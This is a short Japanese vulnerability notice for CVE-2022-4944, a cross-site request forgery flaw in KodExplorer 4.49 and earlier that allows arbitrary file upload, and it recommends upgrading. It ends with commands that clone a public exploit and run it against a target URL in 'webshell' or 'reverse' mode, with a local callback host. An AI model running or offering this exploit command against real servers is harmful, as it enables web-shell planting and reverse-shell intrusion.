
「💥」CVE-2022-4944: KodExplorer 4.49以下 - CSRFによる任意ファイルアップロード

問題として分類された脆弱性が、kalcaddle KodExplorer バージョン4.49までで発見されました。これは未知の部分に影響を与えます。操作によりクロスサイトリクエストフォージェリが発生します。この脆弱性はCVE-2022-4944として一意に識別されています。リモートから攻撃を開始することが可能です。さらに、エクスプロイトが利用可能です。影響を受けるコンポーネントをアップグレードすることを推奨します。

pip install requests
git clone https://github.com/Brosck/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODE # webshell/reverse mode